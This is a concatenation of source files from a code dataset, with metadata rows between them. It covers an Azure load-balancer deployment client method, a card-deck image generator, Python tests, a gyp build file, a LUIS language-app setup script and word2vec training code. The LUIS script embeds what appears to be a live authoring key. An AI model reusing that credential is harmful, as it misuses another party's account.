is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param load_balancer_name: Name for load balancer.
:type load_balancer_name: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param backend_pool_name: Name of load balancer backend pool.
:type backend_pool_name: str
:param dns_name_type: Associate VMs with a public IP address to a DNS
name. Possible values include: 'none', 'new'
:type dns_name_type: str or :class:`dnsNameType
<lbcreationclient.models.dnsNameType>`
:param frontend_ip_name: Name of the frontend IP configuration.
:type frontend_ip_name: str
:param location: Location for load balancer resource.
:type location: str
:param private_ip_address: Static private IP address to use.
:type private_ip_address: str
:param private_ip_address_allocation: Private IP address allocation
method. Possible values include: 'dynamic', 'static'
:type private_ip_address_allocation: str or
:class:`privateIpAddressAllocation
<lbcreationclient.models.privateIpAddressAllocation>`
:param public_ip_address: Name or ID of the public IP address to use.
:type public_ip_address: str
:param public_ip_address_allocation: Public IP address allocation
method. Possible values include: 'dynamic', 'static'
:type public_ip_address_allocation: str or
:class:`publicIpAddressAllocation
<lbcreationclient.models.publicIpAddressAllocation>`
:param public_ip_address_type: Type of Public IP Address to associate
with the load balancer. Possible values include: 'none', 'new',
'existingName', 'existingId'
:type public_ip_address_type: str or :class:`publicIpAddressType
<lbcreationclient.models.publicIpAddressType>`
:param public_ip_dns_name: Globally unique DNS Name for the Public IP
used to access the Virtual Machine (new public IP only).
:type public_ip_dns_name: str
:param subnet: The subnet name or ID to associate with the load
balancer. Cannot be used in conjunction with a Public IP.
:type subnet: str
:param subnet_address_prefix: The subnet address prefix in CIDR
format (new subnet only).
:type subnet_address_prefix: str
:param subnet_type: Use new, existing or no subnet. Possible values
include: 'none', 'new', 'existingName', 'existingId'
:type subnet_type: str or :class:`subnetType
<lbcreationclient.models.subnetType>`
:param tags: Tags object.
:type tags: object
:param virtual_network_name: The VNet name containing the subnet.
Cannot be used in conjunction with a Public IP.
:type virtual_network_name: str
:param vnet_address_prefix: The virtual network IP address prefix in
CIDR format (new subnet only).
:type vnet_address_prefix: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.DeploymentLb(content_version=content_version, backend_pool_name=backend_pool_name, dns_name_type=dns_name_type, frontend_ip_name=frontend_ip_name, load_balancer_name=load_balancer_name, location=location, private_ip_address=private_ip_address, private_ip_address_allocation=private_ip_address_allocation, public_ip_address=public_ip_address, public_ip_address_allocation=public_ip_address_allocation, public_ip_address_type=public_ip_address_type, public_ip_dns_name=public_ip_dns_name, subnet=subnet, subnet_address_prefix=subnet_address_prefix, subnet_type=subnet_type, tags=tags, virtual_network_name=virtual_network_name, vnet_address_prefix=vnet_address_prefix)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Resources/deployments/{deploymentName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'DeploymentLb')
# Construct and send request
def long_running_send():
request = self._client.put(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DeploymentExtended', response)
if response.status_code == 201:
deserialized = self._deserialize('DeploymentExtended', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
| 1,298 | 0 | 119 |
d68f9630a99eb9518e8240ecbf2ea45e3960cb5d | 111 | py | Python | Beginner/URI_2753.py | rbshadow/Python_URI | 4f7df8cdea0eba5c550bb3016b1a7ab6dc723d56 | [
"MIT"
] | 3 | 2016-10-24T13:26:45.000Z | 2020-10-12T17:44:00.000Z | Beginner/URI_2753.py | rbshadow/Python_URI | 4f7df8cdea0eba5c550bb3016b1a7ab6dc723d56 | [
"MIT"
] | null | null | null | Beginner/URI_2753.py | rbshadow/Python_URI | 4f7df8cdea0eba5c550bb3016b1a7ab6dc723d56 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
math()
| 13.875 | 29 | 0.504505 | def math():
for i in range(97, 123):
print(i, 'e', chr(i))
if __name__ == '__main__':
math()
| 49 | 0 | 22 |
53f161c236da9d5618f68b4dac2da82c740c07d7 | 4,081 | py | Python | LWCProto.py | fmolinagomez/LightWeightCardPrototyping | f2d64e36fd01f0101f33da577bdbeb55959df740 | [
"MIT"
] | 2 | 2021-11-02T13:42:16.000Z | 2021-11-03T12:23:03.000Z | LWCProto.py | fmolinagomez/LightWeightCardPrototyping | f2d64e36fd01f0101f33da577bdbeb55959df740 | [
"MIT"
] | null | null | null | LWCProto.py | fmolinagomez/LightWeightCardPrototyping | f2d64e36fd01f0101f33da577bdbeb55959df740 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import csv
import json
import os
import pathlib
import sys
import numpy as np
import cairo
import argparse
import layout
from draw_card import drawCard
from card_model import CardModel
from card_model import CardDeck
def extant_file(x):
"""
'Type' for argparse - checks that file exists but does not open.
"""
if not os.path.exists(x):
# Argparse uses the ArgumentTypeError to give a rejection message like:
# error: argument input: x does not exist
raise argparse.ArgumentTypeError("{0} does not exist".format(x))
return x
##### CLI args #####
parser = argparse.ArgumentParser(description="Deck Generator for Game Designers")
parser.add_argument('-d', '--deck', type=extant_file, help='csv file containing the deck', metavar="FILE", required=True)
parser.add_argument('-c', '--cards', type=extant_file, help='json file containing cards description', metavar="FILE", required=True)
parser.add_argument('-i', '--images', help='Add images to cards', action='store_true')
parser.add_argument('-r', '--rgb', help='Update layout card border colour with given R,G,B, only works with default layout', nargs=3, type=int)
parser.add_argument('-l', '--layout', help='Use a different layout than default', type=extant_file, metavar="FILE")
args = parser.parse_args()
handle_images = args.images
modify_layout = args.rgb
deck_file = args.deck
cards_file = args.cards
#deck_file = './example_deck.csv'
deck_name = os.path.basename(deck_file)[:-4]
nameList = []
list_copy = []
with open(deck_file, encoding='utf-8') as csvFile:
reader = csv.reader(csvFile)
list_copy.append(reader.__next__())
for row in reader:
list_copy.append(row)
nameList = nameList + [row[1]] * int(row[0])
cards = CardDeck(cards_file)
cardList = [CardModel(name,cards.getDb()) for name in nameList]
pageList = [cardList[i:i+9] for i in range(0, len(cardList), 9)]
if not os.path.exists('decks'):
os.mkdir('decks')
if not os.path.exists(os.path.join('decks',deck_name)):
os.mkdir(os.path.join('decks',deck_name))
for page_number in range(len(pageList)):
print(f'Page {page_number}:')
page = pageList[page_number]
surf = layout.getSurface()
ctx = cairo.Context(surf)
for i in range(len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
print(cardPos)
print(card)
mat = layout.getMatrix(*cardPos, surf)
ctx.set_matrix(mat)
drawCard(card, ctx)
surf.write_to_png(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
from add_images import BaseImage
from add_images import addImage
from add_images import processImage
from PIL import Image
if (modify_layout is not None):
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
temp = baseImage.baseImage.convert('RGBA')
data = np.array(temp)
red, green, blue, alpha = data.T
for i in range(0,63):
white_areas = (red == 190+i) & (blue == 190+i) & (green == 190+i)
data[..., :-1][white_areas.T] = (modify_layout[0], modify_layout[1], modify_layout[2])
baseImage.update(Image.fromarray(data))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
#import pdb;pdb.set_trace()
if (handle_images):
if not os.path.exists(os.path.join('decks',deck_name,'images')):
os.mkdir(os.path.join('decks',deck_name,'images'))
#open the previous png to add the images
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
for i in range (len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
processImage(card,deck_name)
baseImage.update(addImage(card,baseImage,deck_name, cardPos))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
with open(f'decks/{deck_name}/{deck_name}.csv', 'w') as deck_copy:
filewriter = csv.writer(deck_copy)
for element in list_copy:
filewriter.writerow(element)
| 33.178862 | 143 | 0.668464 | #! /usr/bin/env python3
import csv
import json
import os
import pathlib
import sys
import numpy as np
import cairo
import argparse
import layout
from draw_card import drawCard
from card_model import CardModel
from card_model import CardDeck
def extant_file(x):
"""
'Type' for argparse - checks that file exists but does not open.
"""
if not os.path.exists(x):
# Argparse uses the ArgumentTypeError to give a rejection message like:
# error: argument input: x does not exist
raise argparse.ArgumentTypeError("{0} does not exist".format(x))
return x
##### CLI args #####
parser = argparse.ArgumentParser(description="Deck Generator for Game Designers")
parser.add_argument('-d', '--deck', type=extant_file, help='csv file containing the deck', metavar="FILE", required=True)
parser.add_argument('-c', '--cards', type=extant_file, help='json file containing cards description', metavar="FILE", required=True)
parser.add_argument('-i', '--images', help='Add images to cards', action='store_true')
parser.add_argument('-r', '--rgb', help='Update layout card border colour with given R,G,B, only works with default layout', nargs=3, type=int)
parser.add_argument('-l', '--layout', help='Use a different layout than default', type=extant_file, metavar="FILE")
args = parser.parse_args()
handle_images = args.images
modify_layout = args.rgb
deck_file = args.deck
cards_file = args.cards
#deck_file = './example_deck.csv'
deck_name = os.path.basename(deck_file)[:-4]
nameList = []
list_copy = []
with open(deck_file, encoding='utf-8') as csvFile:
reader = csv.reader(csvFile)
list_copy.append(reader.__next__())
for row in reader:
list_copy.append(row)
nameList = nameList + [row[1]] * int(row[0])
cards = CardDeck(cards_file)
cardList = [CardModel(name,cards.getDb()) for name in nameList]
pageList = [cardList[i:i+9] for i in range(0, len(cardList), 9)]
if not os.path.exists('decks'):
os.mkdir('decks')
if not os.path.exists(os.path.join('decks',deck_name)):
os.mkdir(os.path.join('decks',deck_name))
for page_number in range(len(pageList)):
print(f'Page {page_number}:')
page = pageList[page_number]
surf = layout.getSurface()
ctx = cairo.Context(surf)
for i in range(len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
print(cardPos)
print(card)
mat = layout.getMatrix(*cardPos, surf)
ctx.set_matrix(mat)
drawCard(card, ctx)
surf.write_to_png(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
from add_images import BaseImage
from add_images import addImage
from add_images import processImage
from PIL import Image
if (modify_layout is not None):
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
temp = baseImage.baseImage.convert('RGBA')
data = np.array(temp)
red, green, blue, alpha = data.T
for i in range(0,63):
white_areas = (red == 190+i) & (blue == 190+i) & (green == 190+i)
data[..., :-1][white_areas.T] = (modify_layout[0], modify_layout[1], modify_layout[2])
baseImage.update(Image.fromarray(data))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
#import pdb;pdb.set_trace()
if (handle_images):
if not os.path.exists(os.path.join('decks',deck_name,'images')):
os.mkdir(os.path.join('decks',deck_name,'images'))
#open the previous png to add the images
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
for i in range (len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
processImage(card,deck_name)
baseImage.update(addImage(card,baseImage,deck_name, cardPos))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
with open(f'decks/{deck_name}/{deck_name}.csv', 'w') as deck_copy:
filewriter = csv.writer(deck_copy)
for element in list_copy:
filewriter.writerow(element)
| 0 | 0 | 0 |
059cd05702586a44598f05cc8b421aa9225178a2 | 1,115 | py | Python | shmakovpn/tests/group_by/test_group_by_extended_dict.py | shmakovpn/shmakovpn_tools | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | [
"Apache-2.0"
] | null | null | null | shmakovpn/tests/group_by/test_group_by_extended_dict.py | shmakovpn/shmakovpn_tools | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | [
"Apache-2.0"
] | null | null | null | shmakovpn/tests/group_by/test_group_by_extended_dict.py | shmakovpn/shmakovpn_tools | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | [
"Apache-2.0"
] | null | null | null | import unittest
from shmakovpn.extend_builtins import ExtendedDict
from functools import reduce
from typing import List, Dict, Any
class TestGroupByExtendedDict(unittest.TestCase):
"""
This class contains tests of **groupby** using **ExtendedDict**
"""
data: List[Dict[str, Any]] = [
{'name': 'alex', 'score': 2, },
{'name': 'john', 'score': 4, },
{'name': 'dan', 'score': 1, },
{'name': 'alex', 'score': 6, },
{'name': 'dan', 'score': 3, },
]
"""the dataset for tests"""
def test_group_by_extended_dict(self):
"""
Test for **groupby** that uses **ExtendedDict**
"""
self.assertEqual(
reduce(
lambda a, b: a.return_updated(
**{b['name']: a.pop(b['name'], []) + [b['score']]}
),
self.data,
ExtendedDict(), # use **ExtendedDict** as an accumulator
), {
'john': [4],
'alex': [2, 6],
'dan': [1, 3],
}
)
| 30.135135 | 74 | 0.453812 | import unittest
from shmakovpn.extend_builtins import ExtendedDict
from functools import reduce
from typing import List, Dict, Any
class TestGroupByExtendedDict(unittest.TestCase):
"""
This class contains tests of **groupby** using **ExtendedDict**
"""
data: List[Dict[str, Any]] = [
{'name': 'alex', 'score': 2, },
{'name': 'john', 'score': 4, },
{'name': 'dan', 'score': 1, },
{'name': 'alex', 'score': 6, },
{'name': 'dan', 'score': 3, },
]
"""the dataset for tests"""
def test_group_by_extended_dict(self):
"""
Test for **groupby** that uses **ExtendedDict**
"""
self.assertEqual(
reduce(
lambda a, b: a.return_updated(
**{b['name']: a.pop(b['name'], []) + [b['score']]}
),
self.data,
ExtendedDict(), # use **ExtendedDict** as an accumulator
), {
'john': [4],
'alex': [2, 6],
'dan': [1, 3],
}
)
| 0 | 0 | 0 |
10688525c6f04116af3dec2bf611c1965388a673 | 926 | gyp | Python | OpenGL/app/examples/examples.gyp | legendlee1314/GLmacia | 67ef41c83404ae0346c522b0045454826c30b8bd | [
"MIT"
] | null | null | null | OpenGL/app/examples/examples.gyp | legendlee1314/GLmacia | 67ef41c83404ae0346c522b0045454826c30b8bd | [
"MIT"
] | null | null | null | OpenGL/app/examples/examples.gyp | legendlee1314/GLmacia | 67ef41c83404ae0346c522b0045454826c30b8bd | [
"MIT"
] | null | null | null | {
'variables': {
'project_name': 'examples',
'current_dir': '<(DEPTH)',
},
'targets': [
{
'target_name': 'basic_sample',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_sample.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'basic_render',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_render.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'simple_texture',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'simple_texture.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
],
}
| 19.291667 | 45 | 0.449244 | {
'variables': {
'project_name': 'examples',
'current_dir': '<(DEPTH)',
},
'targets': [
{
'target_name': 'basic_sample',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_sample.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'basic_render',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_render.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'simple_texture',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'simple_texture.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
],
}
| 0 | 0 | 0 |
95f29f2a630d78c09ee7af58af38a85efc9c3ba3 | 4,287 | py | Python | AiComponent/Python/main.py | paychex/fredonia-paychex-ansible | 05fda7c349953144606cf57e6765493a7dbaf356 | [
"Apache-2.0"
] | 1 | 2019-10-28T15:33:07.000Z | 2019-10-28T15:33:07.000Z | AiComponent/Python/main.py | paychex/fredonia-paychex-ansible | 05fda7c349953144606cf57e6765493a7dbaf356 | [
"Apache-2.0"
] | null | null | null | AiComponent/Python/main.py | paychex/fredonia-paychex-ansible | 05fda7c349953144606cf57e6765493a7dbaf356 | [
"Apache-2.0"
] | null | null | null |
from azure.cognitiveservices.language.luis.authoring import LUISAuthoringClient
from msrest.authentication import CognitiveServicesCredentials
import datetime, json, os, time
authoring_key = "bde233f61f5e4e3fa48ff5a11b0f304c"
region = "westus"
endpoint = "https://{}.api.cognitive.microsoft.com".format(region)
# Instatiating a LUIS client
client = LUISAuthoringClient(endpoint, CognitiveServicesCredentials(authoring_key))
| 44.195876 | 116 | 0.608817 |
from azure.cognitiveservices.language.luis.authoring import LUISAuthoringClient
from msrest.authentication import CognitiveServicesCredentials
import datetime, json, os, time
authoring_key = "bde233f61f5e4e3fa48ff5a11b0f304c"
region = "westus"
endpoint = "https://{}.api.cognitive.microsoft.com".format(region)
# Instatiating a LUIS client
client = LUISAuthoringClient(endpoint, CognitiveServicesCredentials(authoring_key))
def create_app():
# Creating an new LUIS app
app_name = "Fredchex AI"
app_desc = "Terraform and Ansible assistant for Fredchex project"
app_version = "0.1"
app_locale = "en-us"
app_id = client.apps.add(dict(name=app_name,
initial_version_id=app_version,
description=app_desc,
culture=app_locale))
print("Fredchex AI app {} has been created\n with ID {}".format(app_name,app_id))
return app_id, app_version
def add_intents(app_id, app_version):
intentId = client.model.add_intent(app_id, app_version, "CreateResource")
print("Intent CreateResource {} has been added.".format(intentId))
def add_entities(app_id, app_version):
resourceCategoryEntityId = client.model.add_entity(app_id, app_version, "Resource Category")
print("resourceCategoryEntityId {} has been added.".format(resourceCategoryEntityId))
resourceTypeId = client.model.create_entity_role(app_id, app_version, resourceCategoryEntityId, "Resource Type")
print("resourceTypeId {} has been added.".format(resourceTypeId))
numberOfResource = client.model.create_entity_role(app_id, app_version, resourceTypeId, "Number of Resource")
print("numberOfResource {} has been added.".format(numberOfResource))
client.model.add_prebuilt(app_id, app_version, prebuilt_extractor_names=["keyPhrase", "number"])
compositeEntityId = client.model.add_composite_entity(app_id, app_version, name="Resource",
children=["Resource Category", "Resource Type", "number", "keyphrase"])
print("compositeEntityId {} has been added.".format(compositeEntityId))
def add_utterances(app_id, app_version):
# Adding some sample utterances that a speaker may provide as an input.
utterances = [create_utterance("Hey Terraform", "Can you create one virtual machine for me",
("Resource", "Terraform"),
("Resource Type", "Virtual Machine"),
("Number of Resource", "one")),
create_utterance("Hey Terraform", "Can you create two virtual machine for me",
("Resource", "Terraform"),
("Resource Type", "Virtual Machine"),
("Number of Resource", "two")),
create_utterance("Hey Ansible", "Can you create one apache server for me",
("Resource", "Ansible"),
("Resource Type", "Apache server"),
("Number of Resource", "one")),
create_utterance("Hey Ansible", "Can you create one Minecraft server for me",
("Resource", "Ansible"),
("Resource Type", "Minecraft server"),
("Number of Resource", "one"))]
client.examples.batch(app_id, app_version, utterances)
print("{} example utterance(s) has been added.".format(len(utterances)))
def train_app(app_id, app_version):
response = client.train.train_version(app_id, app_version)
waiting = True
while waiting:
info = client.train.get_status(app_id, app_version)
# Method get_status returns a list of training statuses, one for each model.
# Loop through them and make sure all are done.
waiting = any(map(lambda x: "Queued" == x.details.status or "InProgress" == x.details.status, info))
if waiting:
print("Waiting 10 seconds for training to complete...")
time.sleep(10)
| 3,735 | 0 | 115 |
ac906e10a55ee0d9f5ea232d8f09bdca379f1df2 | 4,164 | py | Python | tests/core/test_minmax.py | siliconcompiler/siliconcompiler | 6aa2b53441608f228bd520b68c0324fc9cf96377 | [
"Apache-2.0"
] | 424 | 2021-12-04T15:45:12.000Z | 2022-03-31T20:27:55.000Z | tests/core/test_minmax.py | siliconcompiler/siliconcompiler | 6aa2b53441608f228bd520b68c0324fc9cf96377 | [
"Apache-2.0"
] | 105 | 2021-12-03T21:25:29.000Z | 2022-03-31T22:36:59.000Z | tests/core/test_minmax.py | siliconcompiler/siliconcompiler | 6aa2b53441608f228bd520b68c0324fc9cf96377 | [
"Apache-2.0"
] | 38 | 2021-12-04T21:26:20.000Z | 2022-03-21T02:39:29.000Z | # Copyright 2020 Silicon Compiler Authors. All Rights Reserved.
import siliconcompiler
import pytest
@pytest.fixture
##################################
def test_minimum(chip):
'''API test for min/max() methods
'''
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow , 'syn'))
chip.write_flowgraph('minmax.png')
chip.write_manifest('minmax.json')
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
assert winner[0] + winner[1] == 'syn9'
| 29.118881 | 98 | 0.564601 | # Copyright 2020 Silicon Compiler Authors. All Rights Reserved.
import siliconcompiler
import pytest
@pytest.fixture
def chip():
# Create instance of Chip class
chip = siliconcompiler.Chip('oh_add')
#sequence
flowpipe = ['import',
'syn',
'synmin']
tools = {
'import': 'verilator',
'syn': 'yosys'
}
N = 10
flow = 'testflow'
chip.set('option', 'flow', flow)
threads = {
'import': 1,
'syn' : N,
'synmin' : 1
}
# Parallel flow for syn
for i, step in enumerate(flowpipe):
for index in range(threads[step]):
if step == "synmin":
chip.set('flowgraph', flow, step, str(index), 'tool', 'minimum')
for j in range(N):
chip.add('flowgraph', flow, step, '0', 'input', (flowpipe[i-1],str(j)))
elif step == 'import':
chip.set('flowgraph', flow, step, str(index), 'tool', tools[step])
else:
chip.set('flowgraph', flow, step, str(index), 'tool', tools[step])
chip.set('flowgraph', flow, step, str(index), 'input', (flowpipe[i-1],'0'))
#weight
chip.set('flowgraph', flow, step, str(index), 'weight', 'cellarea', 1.0)
#goal
chip.set('flowgraph', flow, step, str(index), 'goal', 'setupwns', 0.0)
chip.set('metric', step, str(index), 'setupwns', 0.0)
# creating fake syn results
for index in range(N):
for metric in chip.getkeys('flowgraph', flow, 'syn', str(index), 'weight'):
chip.set('metric', 'syn', str(index), metric, 1000-index*1 + 42.0)
return chip
##################################
def test_minimum(chip):
'''API test for min/max() methods
'''
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow , 'syn'))
chip.write_flowgraph('minmax.png')
chip.write_manifest('minmax.json')
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
assert winner[0] + winner[1] == 'syn9'
def test_maximum(chip):
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow, 'syn'))
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.maximum(*steplist)
assert winner == ('syn', '0')
def test_all_failed(chip):
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow, 'syn'))
for index in range(N):
chip.set('flowgraph', flow, 'syn', str(index), 'status', siliconcompiler.TaskStatus.ERROR)
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
assert winner is None
def test_winner_failed(chip):
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow, 'syn'))
# set error bit on what would otherwise be winner
chip.set('flowgraph', flow, 'syn', '9', 'status', siliconcompiler.TaskStatus.ERROR)
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
# winner should be second-best, not syn9
assert winner[0] + winner[1] == 'syn8'
def test_winner_fails_goal_negative(chip):
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow, 'syn'))
chip.set('metric', 'syn', '9', 'setupwns', -1)
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
# winner should be second-best, not syn9
assert winner == ('syn', '8')
def test_winner_fails_goal_positive(chip):
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow, 'syn'))
chip.set('flowgraph', flow, 'syn', '9', 'goal', 'errors', 0)
chip.set('metric', 'syn', '9', 'errors', 1)
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
# winner should be second-best, not syn9
assert winner == ('syn', '8')
| 3,462 | 0 | 137 |
ae23de335349edc7d34e6f29097dd0de8db7fbef | 5,314 | py | Python | Code/run.py | codedecde/WordEmbeddings | 84e6cd5424b74da6e889dd1b6ab7a6c5df9432d9 | [
"MIT"
] | 2 | 2018-09-19T01:37:31.000Z | 2019-09-22T02:45:09.000Z | Code/run.py | codedecde/WordEmbeddings | 84e6cd5424b74da6e889dd1b6ab7a6c5df9432d9 | [
"MIT"
] | null | null | null | Code/run.py | codedecde/WordEmbeddings | 84e6cd5424b74da6e889dd1b6ab7a6c5df9432d9 | [
"MIT"
] | null | null | null | import torch.utils.data as ut
import torch
import cPickle as cp
import numpy as np
from utils import Progbar, getdata
from model import Word2vec
from torch.autograd import Variable
import torch.optim as optim
from constants import *
use_cuda = torch.cuda.is_available()
data = filter(lambda x: len(x) > 1, open(TEXT).read().split(' '))
word2ix = cp.load(open(VOCAB_FILE))
unigram_table = np.load(UNIGRAM_TABLE_FILE)
data = filter(lambda x: x in word2ix, data)
syn_set = {}
ant_set = {}
with open(PPDB_SYN_FILE) as f:
for line in f:
line = line.strip().split(' ')
syn_set = add2dict(line[0], line[1], syn_set, word2ix)
with open(PPDB_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
with open(WORDNET_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
# Convert the sets to lists
syn_set = {w: list(syn_set[w]) for w in syn_set}
ant_set = {w: list(ant_set[w]) for w in ant_set}
def generate_data(data, word2ix, window_size):
"""
Takes in a sequence of words, and returns the indexed data, a list of (word, [2 * window])
:param data: sequence of words
:param word2ix: dictionary mapping words to indexes
:param window_size: Lenght of window
:return indexed_data: List of (word_ix, [2 * window])
"""
indexed_data = []
for ix in xrange(window_size, len(data) - window_size):
word_ix = word2ix[data[ix]]
window = [word2ix[w] for w in data[ix - window_size: ix]] + [word2ix[w] for w in data[ix + 1: ix + window_size + 1]]
indexed_data.append((word_ix, window))
return indexed_data
window = 4
neg_samples = 25
n_syn = 4
n_ant = 4
indexed_data = generate_data(data, word2ix, window)
iterator = DataIterator(unigram_table, indexed_data, neg_samples, syn_set, ant_set, n_syn, n_ant)
BATCH_SIZE = 128
dataloader = ut.DataLoader(iterator, batch_size=BATCH_SIZE,
shuffle=True, num_workers=0)
N_EPOCHS = 5
# lr = 0.001
lr = 0.025
bar = Progbar(N_EPOCHS)
w2v = Word2vec(len(word2ix), 300, sparse=False)
optimizer = optim.Adagrad(w2v.parameters(), lr=lr)
words_processed = 0.
for epoch in xrange(N_EPOCHS):
n_batches = len(iterator) // BATCH_SIZE if len(iterator) % BATCH_SIZE == 0 else (len(iterator) // BATCH_SIZE) + 1
bar = Progbar(n_batches)
print "\nEpoch (%d/ %d)\n" % (epoch + 1, N_EPOCHS)
for ix, batch in enumerate(dataloader):
batch = map(lambda x: Variable(x), batch)
if use_cuda:
batch = map(lambda x: x.cuda(), batch)
loss, p_score, n_score, s_score, a_score = w2v(*batch)
loss.backward()
optimizer.step()
optimizer.zero_grad()
# Update the lr
words_processed += BATCH_SIZE
new_lr = lr * max(1e-4, 1. - (words_processed / (len(iterator) * N_EPOCHS)))
for param_groups in optimizer.param_groups:
param_groups['lr'] = new_lr
loss, p_score, n_score, s_score, a_score = map(lambda x: getdata(x).numpy()[0], [loss, p_score, n_score, s_score, a_score])
bar.update(ix + 1, values=[('l', loss), ('p', p_score), ('n', n_score), ('s', s_score), ('a', a_score), ('lr', new_lr)])
weights = w2v.embedding_i.weight
weights = weights.cpu() if use_cuda else weights
weights = weights.data.numpy()
save_file = BASE_DIR + "Models/vocab_matrix_with_syn_ant.npy"
np.save(save_file, weights)
| 34.732026 | 131 | 0.640196 | import torch.utils.data as ut
import torch
import cPickle as cp
import numpy as np
from utils import Progbar, getdata
from model import Word2vec
from torch.autograd import Variable
import torch.optim as optim
from constants import *
use_cuda = torch.cuda.is_available()
data = filter(lambda x: len(x) > 1, open(TEXT).read().split(' '))
word2ix = cp.load(open(VOCAB_FILE))
unigram_table = np.load(UNIGRAM_TABLE_FILE)
data = filter(lambda x: x in word2ix, data)
def add2dict(w1, w2, w_dict, word2ix):
if w1 not in word2ix or w2 not in word2ix:
return w_dict
w1 = word2ix[w1]
w2 = word2ix[w2]
if w1 not in w_dict:
w_dict[w1] = set()
if w2 not in w_dict:
w_dict[w2] = set()
w_dict[w1].add(w2)
w_dict[w2].add(w1)
return w_dict
syn_set = {}
ant_set = {}
with open(PPDB_SYN_FILE) as f:
